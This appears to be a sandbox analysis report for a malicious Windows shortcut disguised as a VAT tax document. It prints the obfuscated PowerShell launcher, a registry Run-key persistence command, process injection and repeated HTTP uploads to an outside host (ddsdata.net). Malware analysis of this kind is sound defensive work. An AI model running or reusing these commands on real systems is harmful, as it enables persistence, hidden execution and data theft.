sciuroid#>+<#broomrape uncoloredly glandlike#> 'documents');remove-item <#rimous zaptiahs cougher#> -path <#strumectomy hoecake etherish#> $jsdoulrAkk <#dwindlement periclasite pelargonidin#>-force;$NjVWyNaCkCJM=$env:public<#larcher rascalship slough#>+'\documents\start.vbs';&<#paradisea parser diapaused#> $NjVWyNaCkCJM;
cmdline systeminfo
cmdline reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\svchostno2 reg_value C:\Users\Public\Documents\start.vbs
file C:\Users\Public\Documents\desk.txt
file C:\Users\test22\AppData\Local\Temp\Statement of undeclared funds (Enforcement Rules of the Value Added Tax Act).hwp.lnk.lnk
file C:\Users\test22\AppData\Local\Temp\Statement of undeclared funds (Enforcement Rules of the Value Added Tax Act).hwp.lnk
count 882 name heapspray process powershell.exe total_mb 55 length 65536 protection PAGE_READWRITE
ALYac Trojan.Agent.LNK.Gen
Symantec CL.Downloader!gen20
Avast LNK:Agent-HS [Trj]
Kaspersky HEUR:Trojan.Multi.Powenot.a
Sophos Mal/PowLnkObf-D
SentinelOne Static AI - Suspicious LNK
Google Detected
Kingsoft Script.Troj.BigLnk.22142
ZoneAlarm HEUR:Trojan.Multi.Powenot.a
VBA32 Trojan.Link.Crafted
AVG LNK:Agent-HS [Trj]
Time & API Arguments Status Return Repeated

send

buffer: POST /upload.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: ddsdata.net Content-Length: 52 Expect: 100-continue Connection: Keep-Alive
socket: 1300
sent: 163
1 163 0

send

buffer: fn=CBdUhCvxQvW7LA0K392Vfxkr&fd=&r=638381593901250000
socket: 1300
sent: 52
1 52 0

send

buffer: POST /upload.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: ddsdata.net Content-Length: 56 Expect: 100-continue Connection: Keep-Alive
socket: 1304
sent: 163
1 163 0

send

buffer: fn=NKAQbx0E0dZnRN%2bu6p%2biobJr&fd=&r=638381594150468750
socket: 1304
sent: 56
1 56 0

send

buffer: POST /upload.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: ddsdata.net Content-Length: 54 Expect: 100-continue Connection: Keep-Alive
socket: 1300
sent: 163
1 163 0

send

buffer: fn=PEHmzPYu0MRcVeQIcxwNy4z%2f&fd=&r=638381594393593750
socket: 1300
sent: 54
1 54 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\Statement of undeclared funds (Enforcement Rules of the Value Added Tax Act).hwp.lnk
parent_process powershell.exe martian_process "C:\Windows\System32\WScript.exe" "C:\Users\Public\documents\start.vbs"
parent_process powershell.exe martian_process "C:\Windows\system32\expand.exe" C:\Users\Public\vOiCAa.cab -F:* C:\Users\Public\documents
Process injection Process 2552 resumed a thread in remote process 2680
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2680
1 0 0
file 18af887704f996f5_25711309.bat
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Windows\System32\expand.exe
file C:\Windows\SysWOW64\wscript.exe
Time & API Arguments Status Return Repeated

IWbemServices_ExecMethod

inargs.CurrentDirectory: None
inargs.CommandLine: C:\Users\Public\documents\25711309.bat
inargs.ProcessStartupInformation: {u'ShowWindow': 0, u'FillAttribute': None, u'XSize': None, u'XCountChars': None, u'ErrorMode': 0, u'YSize': None, u'EnvironmentVariables': None, u'Y': None, u'YCountChars': None, u'CreateFlags': None, u'WinstationDesktop': None, u'Title': None, u'X': None, u'PriorityClass': None}
outargs.ProcessId: 3052
outargs.ReturnValue: 0
flags: 0
method: Create
class: Win32_Process
1 0 0